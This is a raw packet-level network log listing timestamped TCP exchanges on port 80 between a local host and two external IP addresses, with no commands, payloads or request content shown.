Aug 10, 2024 16:12:22.849503994 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.849514961 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.849523067 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.849534988 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.849539995 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.849550009 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.849556923 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.849565029 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.849579096 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.849582911 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.849600077 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.849622965 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.850388050 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.850399017 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.850409031 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.850419998 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.850430012 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.850436926 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.850450993 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.850455999 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.850464106 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.850470066 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.850481033 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.850491047 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.850501060 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.850517035 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.851144075 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.851191044 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.854275942 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.854322910 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.854381084 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.854389906 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.854418993 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.854427099 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.854583979 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.854593992 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.854626894 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.854834080 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.854844093 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.854876041 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.854929924 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.854940891 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.854953051 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.854965925 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.854975939 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.854984045 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.854990959 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.855005026 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.855021000 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.855364084 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.855372906 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.855382919 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.855398893 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.855415106 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.855597973 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.855607986 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.855617046 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.855627060 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.855634928 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.855645895 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.855649948 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.855664968 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.855679035 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.856175900 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.856184959 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.856194019 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.856204033 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.856211901 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.856220961 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.856231928 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.856236935 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.856245995 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.856251955 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.856267929 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.856281996 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.856287956 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.856317043 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.856838942 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.856848955 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.856858015 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.856868982 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.856877089 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.856887102 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.856897116 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.856904030 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.856910944 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.856919050 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.856930017 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.856937885 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.856947899 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.856955051 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.856962919 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.856970072 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.856988907 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.856997967 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.857754946 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.857767105 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.857775927 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.857785940 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.857795954 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.857805014 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.857810974 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.857822895 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.857831955 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.857841015 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.857851982 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.857857943 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.857870102 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.857877970 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.857897043 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.857912064 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.858671904 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.858683109 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.858692884 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.858696938 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.858706951 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.858716965 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.858717918 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.858727932 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.858740091 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.858748913 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.858752966 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.858763933 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.858767033 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.858778954 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.858778954 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.858794928 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.858805895 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.858931065 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.859534025 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.859551907 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.859561920 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.859574080 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.859580040 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.859586000 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.859594107 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.859603882 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.859611034 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.859618902 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.859627008 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.859635115 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.859644890 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.859652042 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.859663010 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.859673023 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.859709024 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.859740973 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.859740973 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.859740973 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.860392094 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.860403061 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.860411882 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.860421896 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.860433102 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.860438108 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.860449076 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.860460997 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.860461950 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.860476971 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.860479116 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.860502005 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.860529900 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.881989956 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.882010937 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.882025003 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.882030010 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.882046938 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.882074118 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.882477999 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.882492065 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.882503986 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.882519960 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.882528067 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.882558107 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.882638931 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.882652044 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.882663965 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.882678986 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.882687092 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.882702112 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.882702112 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.882716894 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.882725000 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.882731915 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.882740974 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.882755995 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.882776976 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.883491039 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.883502960 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.883514881 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.883524895 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.883537054 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.883543968 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.883555889 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.883565903 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.883570910 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.883582115 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.883610010 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.884433031 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.884445906 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.884454966 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.884468079 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.884478092 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.884480000 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.884495974 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.884505987 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.884510040 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.884520054 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.884545088 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.885253906 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.885270119 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.885279894 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.885288954 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.885292053 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.885303974 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.885323048 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.885341883 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.914694071 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.914782047 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.914782047 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.914794922 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.914819956 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.914851904 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.914978027 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.915024996 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.915049076 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.915091038 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.915194988 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.915206909 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.915215969 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.915237904 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.915266037 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.915587902 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.915599108 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.915608883 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.915618896 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.915627956 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.915630102 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.915642023 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.915653944 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.915663004 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.915674925 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.915698051 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.916521072 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.916532040 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.916542053 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.916552067 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.916563034 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.916569948 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.916574001 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.916587114 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.916594028 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.916605949 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.916623116 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.917160034 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.917171955 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.917182922 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.917193890 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.917207003 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.917231083 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.917570114 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.917581081 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.917593956 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.917604923 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.917615891 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.917622089 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.917622089 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.917628050 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.917639017 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.917654037 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.917675018 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.918471098 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.918483973 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.918493032 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.918505907 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.918514967 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.918515921 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.918529034 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.918529987 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.918540955 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.918551922 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.918551922 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.918576956 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.918595076 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.919478893 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.919491053 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.919502020 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.919513941 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.919524908 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.919528008 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.919538021 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.919542074 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.919549942 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.919559956 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.919563055 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.919580936 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.919610023 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.920269012 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.920280933 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.920290947 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.920301914 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.920311928 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.920312881 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.920325041 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.920336008 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.920339108 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.920348883 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.920348883 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.920372963 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.920397997 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.921196938 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.921210051 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.921220064 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.921231031 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.921241999 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.921241999 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.921263933 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.921263933 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.921283007 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.921288013 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.921308994 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.921322107 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.921895027 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.921906948 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.921916962 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.921928883 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.921938896 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.921962976 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.926517963 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.926529884 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.926539898 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.926570892 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.926589966 CEST	49739	80	192.168.2.4	147.45.44.104
